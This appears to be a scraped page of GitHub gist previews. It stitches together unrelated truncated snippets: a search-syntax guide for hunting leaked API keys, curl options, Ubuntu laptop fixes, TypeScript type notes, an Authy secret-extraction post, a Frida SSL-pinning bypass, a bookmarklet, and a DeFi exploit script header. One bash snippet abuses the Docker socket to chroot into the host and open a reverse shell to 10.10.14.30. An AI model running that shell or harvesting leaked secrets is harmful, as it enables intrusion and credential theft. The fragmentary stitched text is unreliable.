SanariSan

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

This is a collection of Ubuntu fixes for Lenovo Legion 5i

Tested on: Lenovo Legion 5i with below specs:
AMD® Ryzen 7 4800h with radeon graphics × 16
NVIDIA Corporation / NVIDIA GeForce RTX 2060/PCIe/SSE2

1. GPU ISSUES for RTX 2060:

nvidia-driver-470 - HDMI doesn't have to work from the beggining
nvidia-driver-495 - HDMI works from the beginning, unstable (random reboots)\

any: magic, ill-behaved type that acts like a combination of never (the proper [bottom type]) and unknown (the proper [top type])
- Anything except never is assignable to any, and any is assignable to anything at all.
- Identities: any & AnyTypeExpression = any, any | AnyTypeExpression = any
- Key TypeScript feature that allows for [gradual typing].
unknown: proper, well-behaved [top type]
- Anything at all is assignable to unknown. unknown is only assignable to itself (unknown) and any.
- Identities: unknown & AnyTypeExpression = AnyTypeExpression, unknown | AnyTypeExpression = unknown

Prefer over any whenever possible. Anywhere in well-typed code you're tempted to use any, you probably want unknown.

Generating Authy passwords on other authenticators

There is an increasing count of applications which use Authy for two-factor authentication. However many users who aren't using Authy, have their own authenticator setup up already and do not wish to use two applications for generating passwords.

Since I use 1Password for all of my password storing/generating needs, I was looking for a solution to use Authy passwords on that. I couldn't find any completely working solutions, however I stumbled upon a gist by Brian Hartvigsen. His post had a neat code with it to generate QR codes for you to use on your favorite authenticator.

His method is to extract the secret keys using Authy's Google Chrome app via Developer Tools. If this was not possible, I guess people would be reverse engineering the Android app or something like that. But when I tried that code, nothing appeared on the screen. My guess is that Brian used the

	/**
	* Creates a read/writable property which returns a function set for write/set (assignment)
	* and read/get access on a variable
	*
	* @param {Any} value initial value of the property
	*/
	function createProperty(value) {
	var _value = value;

	/**

	#!/bin/bash

	# you can see images availables with
	# curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
	# here we have sandbox:latest

	# command executed when container is started
	# change dir to tmp where the root fs is mount and execute reverse shell

	cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.30/12348 0<&1'\\\"\"]"

	console.log("[*] SSL Pinning Bypasses");
	console.log(`[*] Your frida version: ${Frida.version}`);
	console.log(`[*] Your script runtime: ${Script.runtime}`);

	/**
	* by incogbyte
	* Common functions
	* thx apkunpacker, NVISOsecurity, TheDauntless
	* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
	* !!! THIS SCRIPT IS NOT A SILVER BULLET !!

	javascript: (function () {
	var text = document.body.innerText;
	var spl = text.split(" ");
	if (spl.length > 3000) {
	text = spl.slice(0, 3000).join(" ");
	}

	fetch('https://api.openai.com/v1/completions', {
	method: 'POST',
	headers: {

	// Ex. $ npx ts-node BscRawTx.ts --txData=<txData>
	// Consult: https://github.com/WP-LKL/bscValueDefi-Exploit, for python use-case

	const Tx = require('ethereumjs-tx').Transaction;
	const Web3 = require('web3');
	import Common from 'ethereumjs-common';
	import {parse} from 'ts-command-line-args';

	interface input {
	txData: string;